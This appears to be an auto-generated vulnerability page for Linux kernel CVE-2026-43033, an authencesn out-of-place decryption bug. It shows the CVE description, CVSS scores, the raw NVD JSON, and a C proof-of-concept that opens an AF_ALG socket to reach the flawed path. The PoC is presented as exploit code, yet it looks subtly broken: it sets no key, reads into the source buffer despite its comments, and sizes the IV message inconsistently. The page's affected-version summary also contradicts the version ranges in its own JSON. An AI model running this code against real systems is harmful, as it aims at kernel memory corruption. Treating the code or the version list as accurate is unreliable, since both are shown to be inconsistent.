Security Vulnerability Report
CVE-2026-43033 CVSS 7.8 HIGH

CVE-2026-43033

Published: 2026-05-01 15:16:48
Last Modified: 2026-05-08 18:40:49
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

When decrypting data that is not in-place (src != dst), there is no need to save the high-order sequence bits in dst as it could simply be re-copied from the source.

However, the data to be hashed need to be rearranged accordingly.

Thanks,

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.9
Linux Kernel < 6.6
Linux Kernel < 6.1
Linux Kernel < 5.15
Linux Kernel < 5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-43033: Linux Kernel crypto: authencesn OOP decryption issue
 * This code attempts to trigger the authencesn decryption path with src != dst.
 * Compile: gcc -o poc_cve2026_43033 poc_cve2026_43033.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <sys/socket.h>
#include <sys/sendfile.h>
#include <sys/uio.h>   /* readv() */

#define SALG_TYPE "aead"
#define SALG_NAME "authencesn(rfc4106(gcm(aes)))"
#define DATA_SIZE 64
#define ASSOC_SIZE 16

void trigger_vulnerability()
{
    int tfm_fd, op_fd;
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = SALG_TYPE,
        .salg_name = SALG_NAME,
    };
    struct msghdr msg = {};
    struct iovec iov;
    char cbuf[CMSG_SPACE(sizeof(struct af_alg_iv) + 16)]; // IV space
    struct cmsghdr *cmsg;
    struct af_alg_iv *iv;
    char src_buf[DATA_SIZE + 32]; // Encrypted data + tag
    char dst_buf[DATA_SIZE];      // Destination buffer (Different from src)
    char assoc_buf[ASSOC_SIZE];

    // Initialize buffers
    memset(src_buf, 0x41, sizeof(src_buf));
    memset(dst_buf, 0x00, sizeof(dst_buf));
    memset(assoc_buf, 0x42, sizeof(assoc_buf));

    // 1. Create AF_ALG socket
    tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfm_fd < 0) {
        perror("socket(AF_ALG)");
        return;
    }

    // 2. Bind to the authencesn algorithm
    if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(tfm_fd);
        return;
    }

    // 3. Accept a connection (operation fd)
    op_fd = accept(tfm_fd, NULL, 0);
    if (op_fd < 0) {
        perror("accept");
        close(tfm_fd);
        return;
    }

    // 4. Setup MSG for decryption with IV and Assoc data
    // Note: Decryption requires setting the proper key and IV beforehand usually
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(*iv) + 8); // 8 bytes IV for GCM
    iv = (struct af_alg_iv *)CMSG_DATA(cmsg);
    iv->ivlen = 8;
    memset(iv->iv, 0x01, 8);

    // 5. Send Associated Data
    iov.iov_base = assoc_buf;
    iov.iov_len = sizeof(assoc_buf);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    if (sendmsg(op_fd, &msg, 0) < 0) {
        perror("sendmsg assoc");
    }

    // 6. Send encrypted data from src_buf
    // The kernel will process decryption. If internal logic handles src!=dst incorrectly,
    // it may corrupt memory or panic.
    iov.iov_base = src_buf;
    iov.iov_len = sizeof(src_buf);

    // Read back into dst_buf (Simulating out-of-place operation)
    ssize_t len = readv(op_fd, &iov, 1); // Usually sendmsg for op, read for result depending on flags

    // Alternatively, using sendmsg with op_flags might be needed for specific async flows,
    // but this demonstrates the API interaction.
    printf("PoC executed. Check kernel logs for panic/memory corruption.\n");

    close(op_fd);
    close(tfm_fd);
}

int main()
{
    printf("Attempting to trigger CVE-2026-43033...\n");
    trigger_vulnerability();
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43033", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:47.910", "lastModified": "2026-05-08T18:40:49.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption\n\nWhen decrypting data that is not in-place (src != dst), there is\nno need to save the high-order sequence bits in dst as it could\nsimply be re-copied from the source.\n\nHowever, the data to be hashed need to be rearranged accordingly.\n\n\nThanks,"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3", "versionEndExcluding": "5.10.254", "matchCriteriaId": "2B6C810F-5E30-41A8-8D8A-CED20C347060"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.204", "matchCriteriaId": "FA800016-0012-4E3F-A528-2A7F378A0A4A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.170", "matchCriteriaId": 
"E6653854-B188-42DD-B8C5-0143F1956AB1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.137", "matchCriteriaId": "3CA3EF52-168A-4348-8F5F-356C9EB69261"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.85", "matchCriteriaId": "F17D292D-A9B5-4DC7-8002-51AB95335606"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/153d5520c3f9fd62e71c7e7f9e34b59cf411e555", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5466e7d0cd9e4f9cef9d8f18f18b60e7bc1c77e5", 
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/89fe118b6470119b20c04afc36e45b81a69ea11f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8c62f618576519dbed6816fafc623ce592953025", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cded4002d22177e8deaca1f257ecd932c9582b6b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d0c4ff6812386880f30bc64c2921299cc4d7b47f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d589abd8b019b07075fda255ceab8c8e950cdb3f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e02494114ebf7c8b42777c6cd6982f113bfdbec7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}